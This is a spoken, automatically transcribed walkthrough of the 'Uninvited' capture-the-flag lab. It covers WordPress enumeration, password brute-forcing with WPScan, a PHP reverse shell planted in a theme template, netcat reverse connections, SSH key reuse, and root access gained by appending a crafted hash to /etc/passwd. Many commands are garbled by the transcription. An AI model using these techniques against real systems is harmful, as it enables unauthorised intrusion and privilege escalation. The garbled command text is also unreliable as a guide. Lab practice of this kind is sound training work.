Hello guys, welcome back to Reconnaissance Club. Today we're going to solve another CTF challenge name called Uninvited. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture the flag. So first, open the terminal. Now I just make it as a little bit big. Now just type it as sudo su, enter our password. Then you just type it as net discover minus I80. So first I would like to identify my target mission here. So I have identified my target mission. Now just quit this. Now just type enter here. Nmap -34 -a is an aggressive scan and enter your targeted IP address. So now let's wait for the Nmap result. So I have got the Nmap results, but I need to get more in depth for this as a Nmap result. So let it get you this one. Now for that we would like to visit to the targeted Nmap result. So just look here as 192.168.18.a78. Now it looked like a SEC corporation. Allied. Now in this I didn't get any useful information here. Allied security solutions. Now in this case, now I would like to look the pesos. In this pesos, so we would like to look here. There we have got a footer and somewhat a useful information here. This one. This is the one. Let's just copy this. Now let me I can open in the one notepad. Let me just paste this. Now entirely just copy this one. Now let it come back here. Now let's just open here. Now it just paste here as a echo with the base64. Base64 as deco. Yeah, I know it happens. I guess what you want to do this field force to your hostess. Okay, now just copy this one. Now let me just it not even coming here. I just type here as sudo su, enter your password. You just type here as nano etc posters. Now let me just put it here as 78. Then let's just paste this field force. So I just type Control O, Control X. I just put here as cat etc posters. Okay, 78. Now we would like to go back here. I just put here as HTTP. Then let's just put here as a field force. Yeah, okay, we have got it here. Now our next task is we would like to go for as directory enumeration. Now let me just type here as exit. I just type here as clear. Now we would like to go for a directory buster. Then let's just I have made a mistake here. Just put here as HTTP. Then let's just come back here. Let it paste it. Now let's just copy this. It says a not found, but it was getting us something results. Now let me just make it as another one is anecdote minus h for host. Then let's just paste it. Now it was running. Now again I would like to look here as another thing. I would like to also a foots. Let's wait here. So it may take a more lengthy time process to extract all the information from here. Now let me I just enter here as a 6000. The address used in network is restricted. Now I just put here. Yes, it may be as we have got here. So this to get a Nmap results, so it may taking a long lengthy time process to get. So I have already know this port. Now I would like to look in this. So just copy. Now, let me come back here. Now, we would like to look. So it was posted like in the WordPress website. That's it. Uninvited. USA network is known as innovation program. Sure, it suits for collaborations. Okay. Now, first of all, we would like to look as WP foods minus C minus T is 300 minus minus HC equal to 404. Then I specify the word list is as user share word list. Then put here directory buster. Then you just put here as directory list 2.3 medium.txt. Then I would like to put my targeted IP address is 192.168.18. Here. Otherwise, if we would like to go also here, let me 18.78, then you just put here as 60,000, then you just put as a foods. That's it. There. It will try to push also. Now in this case, now we would like to try to utilize this, so just copy this one. Now let me just also try with as directory buster here. Then you just need to delete this. There, it will also get, but it was a restricted somewhat. Now we would like to look this here for this one. So where I got like a WP content, and so what else it is available, it was printing there. So if there is a WP content, we can get it as a WP admin also. So for that, now we would like to look this, so it's not even get, now just type it as clear. Now I would like to go for as uh, WP scan minus minus URL. So you just need to target this targeted URL. Now just copy. Now let's just paste this. Now you just put here as minus minus enumerate. So I would like to put only this enumerate users and plugins. Now it will enumerate users and plugins. Now do you want to update? So just put as no. Now it will take a little bit time to enumerate all those things. So where you can look here as WP content and everything. That's it. We not yet get any useful informations apart from here. So it may take a lengthy time process to get enumerate all those things here. Now I have got only the one username is Alloy. So just copy this. Now let's just come back here, let it paste it. Now if you want to go here, as now we would like to type here as a WP admin. Now it's not going for a WP admin. Okay. Now we just come back here. Now I would like to read this. Now I just look at pesos. So here we noted get. In this also we not yet get. Now, so it's not reported anything else. So what we would like to do here is, so we just visit this here. Now I would like to look here in the pesos field force a WP admin WP JSON. So here I not yet get any useful information. Now let's just copy this, just copy. Now let's come back here, let it paste it. Now in this field force, now I would like to go here as apart from this as WP admin. No, it's not going here as. So it's not getting here as a WP admin. So how we would like to get this here? So here we not see how to go here as WP admin. It also failed. Now let we just try this as we would like to look this WP core WordPress. So we try with this as enumeration. Still not yet even get here. So here I have a backdoor. So I just copy this backdoor. Now I can visit to this backdoor. Now I have got it here as a login to any WP admin. Okay, now we would like to try here as which one is uh, somewhat we would like to try with this. Now let it load this one. Now let's come back here. Now found with as and one with the bullet post. So now just type here as clear. Now I just try to do here as civic minus D3. Now I just put here as HTTP and through targeted IP address 192.168.18.78. 2. Just put as password.txt. Now it will generate the password list. Let's see how many passwords it may can generate. So this you just need to go as along with the field force. Let's just copy this, open this field force as a backdoor. Now you can get exactly the login page. So we can see here alloy. We would like to try as a default thing. We just try here as alloy. Now we cannot able to log in here with this alloy and alloy. Now what you just need to try here. Now we would like to utilize here like that we can do as in this as backdoor. We would like to look the passwords. We not get anything else, so let me I just close this. Now let me come back. So we just type it as word count list password.txt. So I have get here as 331 passwords. Now with the same thing, uh, let me just put here as a password one. Then you just put as 60,000. That's it here. Now it will also generate a password list. It was generated. Now just type here as uh, word count list password one.txt. It's I have got a 70 password list. Now you just need to move all this. You just put as get password one.txt to just put as password.txt. That's it. Now later you just type word count list password.txt. It's have 401. Okay, that's great. Now you can put as wp scan minus minus url. You just need to specify username is alloy. So this is a username alloy. Password is password.txt. That's it. Now we would like to look here. We just put no. Now we try to crack this password automatically. Now but maybe we cannot able to uh, either we can able to find a one right thing, otherwise not right user password here. We can try here. Now also I can try to look here as I can go back here in this place. We would like to look this a reading. Let's look here. I would like to open this and new link. So where I not get anything else. So we can try here. No valid passwords is found. Now let we would like to look from here only. No, not get. So we would like to try here. Here, let me just uh, look here. Is something in the inspect elements. Now here as somewhat interesting thing. Now we would like to look here as so we would like to utilize this a white rose agrees. Let's just copy this one. Now let's come back here. Now I would like to paste this a white rose. So just copy. So it may take a lengthy time process to understand here everything. Now let's New York time zone. Let's close this. Then let me paste it. Then try to log in here. Now we can log in here as successfully. Now you can put it here as remain later. Now once you have put it here as remain later, now you would like to go for as go to a pentest monkey GitHub. Let it go and get this. Now you can see everything here in the pentest monkey. Now let's go here. I think I may have a reversal. Now just type it as list. No have remove as password.txt. Now I would like to come back here. So this you need to get here. You just copy the raw file, copy. Now just come back here. You just put as nano etc hostess. Oh sorry, I just need to put this. Oh sorry, you just put as nano rshell.php. So I just entirely just press here control co control X. Now just type here as clear. You just look as a ifconfig. This is your target IP address, so just copy. You just type here as clear. You just type here as a mousepad rshell.php. That's it. Now just go back here. So we just need to change this targeted IP address here. That's it. Change this and don't manipulate anything else. So now just click on save this. Now just quit this. Now you just set up a netcat customer. So this is no useful. This now just put as netcat minus lvnp 1234. Now we would like to come back here where this is in the dashboard. Now just click on appearance theme editor. So it may take a little bit lengthy time process. So now we would like to go back here as a 404.template. Now entirely just delete this. Now let's come back here in this place. So we just open a new tab. Now I just make it as a little bit big. Now just type list. You just type as mousepad rshell.php. Now just entirely just copy, come back You just paste it here. Then let's just update this file. So it may can get here as unable to communicate with the back with the site. Check the fatal error. So the PHP changes was retrieved. So we cannot able to install this. So in this case, what you just need to do here is now I would like to go with this Metasploit. I just go for MSF console. Now we would like to look this here. Now let I would like to try here as so here as moon space 2 I would like to put 2090. Then I just try to select, then I just put here as that's well and good in this case. Now I just put as 404.template. Now let me I just entirely just pasted my PHP reversion. I would like to cross check. Yes, it is a PHP reversion with my target IP things. Now let me I can update this file. I have successfully updated now. You can see you just need to cross check somewhat very clearly. Then only you can get it here. Now let we would like to look here is now let me just paste it here. Uninvited. Now let's just so we already know this HTTP field ports. Now just put as WP content. Now you just put here as a themes. Now 20. What is the theme you just use here? 2019. So 2019. Sorry. We would like to look here is 2019. Now put as 404.php. That's it. So where you have successfully get the reversion here. Now I just type here as ID. You got it here. Now I just type here as who am I? You get it here. Now so it's not going to present here anything else. So now I just put here as a which Python. It not get. Again, you just type here as which Python 3. You have got the response right now. Let's see. So it may be still a little bit interactive with this. Yes. Now just type here as Python 3 minus C. Import a pdy span bin bash. Now I have got here as everything. Now you just put as like let me I just put here as a export a tab equal to x tab. Then that's great. Now let me I just type it as clear. I just type it as list minus a. Now let me I just go to as home directory and I just type ls minus a. Let's see. So this is like demo docker. So this was a little bit uh, slow machine. Now I just type plus minus here. Now we just put here as a cat user 2.txt. If permission is denied, now let me I just put as a local. Now let's just type plus minus here. Now just type it as cat node.txt. It may be presented. Now let's just copy this. Now let me just come back here. I just quit this and I just type it as clear. I just put as echo. Then let's just paste it here. Just put as a base 64, base 64 as decode. Encode with that twice with this. So I just copy, put as echo. Then let's just paste it and put as again base 64 as decode. App society. Okay, I just need to get as fsociety.exe. Okay, now let me. I would like to open this. I would like I would like to go to for a Windows machine. Now let's just open this. Now I want to directly download into a Windows operating system. I enter my password. So let it we would like to go here. In this case, now let's just close this here. Now let me come back here. Now let me I just open a new tab. Now we just enter as http 192.168.18.78 along with what is this fsociety.exe. Just copy, come back and let's just paste it. I have downloading this fsociety.exe. Now it was downloaded. Now I want to launch this. Now click on more info. Now click on run anyway. Now it asks a username. Now let me. I would like to put this history. I would like to delete everything. So what is the username? Is I not yet get here anything else. So once again, then I can do one thing. Here is Now, what we would like to try here is, we would like to go back here. Uh, we would like to try with the username as alert and password is like Mr. Robot. I can show you that. Okay, now we would like to go for here is uh, username is alert, password is Mr. Robot. Now, user has been identified as well, alert. The hint. Do you know Python reversal? A client server socket program. IP address is and port and IP address and use the port is 8888 and patience. Now, we would like to try here is we would like to go back here, come back this in this case. Now let's just type here as clear, you just type here as ifconfig, where I have got it here as one targeted IP address. Now I would like to put here is I would like to go to a temp directory. Now in this temp directory, now we would like to type here is our IP address is 3 here. Now we would like to try here is now we can look here. Python reversal. Okay, just I would like to copy this a Python reversal. So where we would like to get here? I would like to look here is in this case a list minus a no have. Now how I can get? Now I would like to go to here. Now I try to get a netcat binaries. Now I can go and get into this netcat binaries from GitHub. So this one we just need to get here. Now let's just I would like to get entirely this one, just copy this one. Now let it get back to here in your machine. Now just type here as wc get, then let it paste here. where you have got it here. Now just try close. Here have a netcat. Now you just type here as a clear. Just type here as first you just type close. You just type here as Python minus f http dot a server. Now let's we just come back here. You just put as wget get http and carry out target. Type here as 192.168.18.122. Then you just put as 8000. Then here is a netcat. Then where we have got this netcat. So we have got this a netcat. Now we just put a chmod plus x as a netcat. Now in this case, my targeted IP address is 172.168.18.3. In this case here, what it shows, IP address with the port is 8888. I just need to use as 8888. Now, I have given here a targeted thing. Now just put as netcat minus lvrp. Let me I can look one more time. Is 888 double eight. That's it. Here. No. Now let me I just type here as clear. And I just type here as config. Now like type list. You just put as a netcat minus lvfp nlvp 8888 in the new line. So I try this. Now I would like to close this again. Now I want to start from beginning. Now I would like to start this app society. Now you just put as alloyed Mr. Robot. Now in this case it's not even present in here. Now I just write here as clear. You just put as netcat minus lvlp 8888. It shows netcat minus nvlp 8888. So why it was showing here like this? Otherwise, I just quit this. So now I just try to get connect with again this, and I will just copy. Then you just try to connect it here. I just write as Python 3 minus c import a pdy span bin bash. So sometimes for solving, it may take a little bit some time. This thing bin bash. Now just type put here as export term equal to extra. Then now just type as clear. Now go to a temp directory. Now just put as netcat minus LVNP 8888. Okay, it shows a netcat is not valid. You just put as netcat minus LVNP 8888. A syntax is error with a token or new line. Why? It shows. Now I can ask a ChatGPT. Either we are taking the right one, otherwise a wrong one. We just need to look that. Now, otherwise, I can try as a netcat minus LVP 8888. Now just look, here is ifconfig. So if we use the port, remember patience is the key. So how long is the patience? Let's just put as minus LVP 8888. So it was unaccepting here, this one. Now let's just copy this. Here, we prefer not to get anything else from here. Now, we would like to put here as which netcat? No netcat. Here, which Python? No Python. Which Python 3? Here have a Python 3. Then we have downloaded the wrong file here. In this case, where netcat no have. Now, in this case, we would like to put here so in this case, if no have as a netcat over there and this netcat is not going to be worked out, I just type remove as a netcat. Now let me I would like to put here as copy user bin as a netcat to home pentester club to a netcat. Now I just type plus. Here I have a active netcat, this one. Now I just type here as Python minus m http.server. I just put as 80. Now let's me just type here as remove this a netcat. Now what we would like to do here is, so now I just type here as wc get http 192.168.18.122, then it's 80 and put as netcat. Now once you have got it here, you just put here as chmod plus x as netcat. Now you just put as a netcat minus lvnp 8888. It's required, not found. Why as netcat? Oh my god. So we just need to utilize a chat GPT. So it was I totally mistaken everything. Now we would like to utilize the chat GPT and we try to solve this. So why it was giving us like this errors? Now let me just paste this here. Uh, Give me a solution. Uh, Netcat banner is up. Great. Then go to here as netcat. Otherwise, we would like to look this as raw. So I would like to try with this. Let's just go back here. I just type here as clear. Remove this netcat, copy from downloads as netcat to. Now let me I just do here is remove this netcat. Let's just type here as clear. Now just put awc get 192.168.18.122 and we just type here as netcat chmod plus x to a netcat. Now it was listening now. So you just need to download this one. Now ChatGPT is also does not helpful. Now if it was a listening, now what you just need to do here is now I would like to look here is I just press enter. Here I noted get a netcat listener. So it was suspending everything. Now there is a netcat. So you don't need to worry right now. Now let's we just go back here. We just type as a Python 3 minus C import pdy span bin bash. Now there you have got this a netcat. Now just type here as a export tab equal to extra. Now just type here as clear export tab equal to extra. Now go to a temp directory. Now just type here as clear everything. Now just type plus minus here. Now in this case what you just need to do here is now let me I just type here as a ifconfig This is 103. Now I can run this again as F society. Now username is alloyed Mr. Robot. Now it was listening over there. Now I just put here as netcat. Now it may can get as connection. Now we just need to wait. So you can see here it was get a connected to a 103. Now I just type ID. We are getting here as ID. Now I got here as a Docker sec. Now you just type here as a less minus a where you get entire. Now I just type here as get a user 1.txt where I have got it as one flag. So just copy. So this mission is quite very hard. You need to understand very clearly. Then only you can get it here. Now, you just go to here as put here as cat.sh. Then you just put here as id underscore rsa. So entirely just copy your id underscore rsa. Just copy this one. Come back here in this case. Now just put here as nano id underscore rsa. Let's just paste this. Just type Control O, Control X. Now you just put here as chmod 600 id underscore rsa. Where you have got it here. Now just put here as sh docker at the rate enter your targeted IP address 192.168.18.78 and then minus I id underscore rsa port. Port you just need to specify the port number is 7894. So 7894, this is your port. Where we just come back here 7894. It asks yes, permanently is denied. So why it's permanently is denied here? So everywhere you can get it this one. We have getting here as a wrong thing. So without this we just look here as something. Now we are already in the Docker. Now I just put here as also export it equal to extra. Now just type here as clear. Now it not work out here. Now we just need to copy this entirely. We just copy the id underscore rsa, but it's not working out also. Now I just copy this one. Now we would like to come back here. Now I just put here as id underscore rsa. Now just type here as clear. Now just type here as nano rsa. I just paste this. Control O, Control X. Now we just put here as chmod 400 id underscore r. Oh, sorry. I need to put only the RSA. Now just type here as clear. You just put as such a docker with the only with the id underscore RSA. Connection is refused. Okay. Now sh I sh minus I as RSA docker and terraform target IP address 192.168.18.78. Now port is 7894. Permission is denied by public key. Okay, chmod 600 as RSA. Now remove this RSA. Now just type it as clear. Now again, let's just copy this. Now we just put as nano id underscore RSA. Let's just paste this. Control O, Control X. id underscore RSA. Now we just put as such. I would like to put here as id underscore RSA. So why it's give as public key is denied? Again here, let I just look how it may be denied this public key. So I can look this. Ah, very interesting. So not a Docker, here is a docsec. So this is making a mistake here. So that's why it was a denied. Now let's just go here as. So you just need to cross check. Sorry for the mistake. Now we have login here as successfully without fail. Now just type here as a clear. Now just type ID. We get here as a docsec. Now we have login here. Now just type here as ls minus la etc password. Now where we have here as etc password. Now we would like to try this here. What we would like to try here. Now I would like to look here as what else everything is available. Now I just put as home directory. Now just type plus minus l cd gvar. Now just type plus minus l. Now let me just type it as clear plus minus l. We just put here as cat sudo as admin successful. Let's just paste this. Nothing. Now what we would like to do here is now I would like to come back here. In this case I just quit here. Now I just type here as a clear. We just put here as sudo open sl. Now we just put here as password as -6 and start as I would like to put as JSON. Password is 123456. That's it. Enter your password where I have got this entirely. So now you would like to do here is one more thing is like let me go back to here as docsec. You just put here as cat etc password. Now you just entirely just copy this a root one. Now let's come back here. Now let's just in the root place I just put as a JSON. Now in the X place I would like to put here this one value. Just entirely just copy, come back here. Let me just paste it here. So I want to get this one as a little bit big. Now I would like to put here is echo as put here to here. Now just put as etc password. That's it. I would like to get. So we just add tally, just copy, come back here. In this case, now we just type here as a clear. We just put here as nano. Oh, sorry. Uh, I just need to put entirely this one. Just I have put it here. Now just put cat etc password. So where I have here. Now just put here is su just 1 2 3 4 5 6. I have successfully came to a root access here. Now we just type here as who am I? Oh, sorry. cd root. Now just type plus minus a. Now just type cat a root.txt. So I have got another flag also. That's it. So where we have successfully completed this mission. That's it. So you try it your own guys. Thank you guys for watching and keep smiling.